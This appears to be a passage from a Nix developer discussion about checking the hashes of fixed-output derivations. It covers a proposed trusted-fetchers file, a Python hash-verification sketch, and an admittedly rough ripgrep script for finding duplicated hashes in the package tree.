Well, they can always do that, for instance by implementing their own FOD derivation, without even relying on a pre-existing `fetch*` at all.
Making full-featured `curl` into a Nix builtin is a possibility (as opposed to the `fetchurlBoot` that exists now), but what about derivations fetched with `curl` and then unpacked with `zip` […] Is it possible to do? Yes. Is it a desirable solution? Probably not.

That's precisely why I don't want to include this in Nix directly, but provide Nix with a `trusted-fetchers.nix` file via a command line like `nix --trusted-fetchers trusted-fetchers.nix`, or simply by picking this file up automatically by default. One needs to think carefully about this file, but after a quick thought, it could look like:
```nix
{pkgs, ...}: {
  "fetchurl" = {
    args = [ "url" ];
    script = ''
      # Download and hash; Nix then compares $tmpOutSha with the declared hash.
      ${pkgs.curl}/bin/curl "$url" -o "$tmpOut"
      ${pkgs.coreutils}/bin/sha256sum "$tmpOut" > "$tmpOutSha"
    '';
  };
}
```
This way, when a user calls `fetchurl { url = "https://foo.com"; hash = "somehash"; }`, it would create a derivation like:

```
Derivation({
  "trustedFetcher": "fetchurl",
  "url": "https://foo.com",
  "hash": "somehash"
})
```

(see that it is agnostic of `curl`'s version), and to execute it, Nix would pick the appropriate fetcher in `trusted-fetchers.nix` (unless the output is already present in the cache), run the corresponding script, and compare at the end the content of `$tmpOutSha` with the hash in the derivation. If they match, it then derives the final `$out` from the `hash` of the derivation and copies `$tmpOut` to this path.
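The final verification step could then be as simple as (sketch; `store_path_for` stands in for Nix's real output-path computation):

```python
import shutil

def finalize_fetch(drv, tmp_out, tmp_out_sha, store_path_for):
    # Compare the hash computed by the trusted fetcher with the declared one;
    # only on a match does the result get moved into the store.
    with open(tmp_out_sha) as f:
        actual = f.read().split()[0]
    if actual != drv["hash"]:
        raise RuntimeError(f"hash mismatch: expected {drv['hash']}, got {actual}")
    out = store_path_for(drv["hash"])
    shutil.move(tmp_out, out)
    return out
```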
How are you doing this, exactly? Are you parsing Nix files by hand?
Right now this is done in a very dirty way, via a simple grep (install `ripgrep`):
```python
import os
import re

# For each hash that appears more than once in the tree, print the matching
# contexts, skipping matches that look like legitimate reuse (same owner or
# same url repeated).
for line in os.popen("rg -o 'hash = \".*\"' --no-filename | sort | uniq -c | sort -hr | rg -v \"1 hash\" | rg -o '\".*\"'").readlines():
    print(f"==={line}")
    output = os.popen(f"rg -F '{line.strip()}' -C 5").read()
    res = re.findall(r'owner ?= ?"[^"]*"', output)
    if res and len(res) - len(set(res)) > 0:
        print("The owner appears twice, sounds good enough here")
        continue
    res = re.findall(r'url ?= ?"[^"]*"', output)
    if res and len(res) - len(set(res)) > 0:
        print("The url appears twice, sounds good enough here")
        continue
    print(output)
    print("===================================================================\n\n\n")
```
You can see that the number of duplicated hashes is quite large (155), so I try to discard some of them automatically, for instance if I see the same URL twice around the matching lines, but this is very dirty, and I don't consider it any good security measure. Even with this sorting there are quite a lot of entries to read manually, so it would be better to actually extract all such `fetch*` calls and try to run them (without using the local cache, of course; not sure how to do that) to see if the hash is actually correct…
Currently the source is only re-fetched when the hash changes. When you use `nix-env -i` to find the new hash, but forget to make a change to the hash, you are stuck with the wrong source. To add injury to insult: the source is then not re-fetched when you change the hash; you first have to garbage-collect the old source.
to find the new hash, but forget to make a change to the hash, you are stuck with the wrong source.To add injure to insult: the source is then not re-fetched when you change the hash: you first have to garbage-collect the old source.